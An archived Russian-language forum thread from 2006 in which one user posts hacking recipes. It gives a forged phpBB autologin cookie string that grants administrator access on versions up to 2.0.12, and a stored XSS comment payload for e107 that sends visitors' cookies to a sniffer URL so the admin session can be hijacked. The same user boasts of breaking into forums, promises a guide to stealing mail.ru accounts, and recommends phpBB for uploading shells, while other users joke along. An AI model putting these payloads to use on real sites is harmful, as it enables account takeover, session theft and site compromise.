View Full Version : Хакаем(ломаем)
DAVid-hay
19 Dec 06, 04:53
И так начну -)
phpBB прославилась своей простотой, удобностью в юзании, но и своими мега дырками. Начнем с ранних версей...
баг есть в версии вплоть до 2.0.12
(внимание нужен бразуер с возмоностью редактирования куки)
1 регистрируемся на форуме -)
2 логинимся(заходим) под своим login & pass
3 изменяем куки с стандартных, на следующие
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
DAVid-hay
19 Dec 06, 04:59
e107 - не менее знаминитый движок(cms) , как известно у него свои дырки.
1 заходим под обычним юзером
2 добавляем в новости комент со следущим кодом(путь конечно нужо поменять на свой)
img=new Image();img.src="http://localhost/sniff/s.gif?if=2&"+document.cookie;
3 идем в шнифер и смотрим что там у нас появлось.
4 подделвываем куки и все у нас права админа.
работает на всех версиях, где можно вставить комент с подобным кодом =)
Ой, чему это вы нас учите, мы тут все законопослушные граждане :shuffle:
Speechless
19 Dec 06, 22:55
Главное, написал как наш форум взломать))))
А ведь найдется умник, который испробует)))
e107 - не менее знаминитый движок(cms) , как известно у него свои дырки.
1 заходим под обычним юзером
2 добавляем в новости комент со следущим кодом(путь конечно нужо поменять на свой)
img=new Image();img.src="http://localhost/sniff/s.gif?if=2&"+document.cookie;
3 идем в шнифер и смотрим что там у нас появлось.
4 подделвываем куки и все у нас права админа.
работает на всех версиях, где можно вставить комент с подобным кодом =)
может после взлома нормальный форум сделают:smile:
DAVid-hay
19 Dec 06, 23:12
Главное, написал как наш форум взломать))))
А ведь найдется умник, который испробует)))
знаешь когда нашли дырку в phpbb до версии 2.0.12 все форумы с такой версией были снесены любителями -) знаешь довольно весело, я сам пару таких взломал...
Сегодня постараюсь сделать подробный урок, как угнать акууант с mail.ru -)
А этот форум кстати такими методами не взломаешь -)
А этот форум кстати такими методами не взломаешь -)
Ииии... почему раньше не сказал? пытаюсь-пытаюсь, никак не получается :angry: :sleep: :smile:
DAVid-hay
31 Dec 06, 17:57
юзайте XSS, немного изобретательности и все будет.
Вообще phpbb радует тем,что туда лучше всего получаеться шеллы заливать -)
ты что детей то такими методами травишь)))) :chert:
Powered by vBulletin® Version 4.2.2 Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.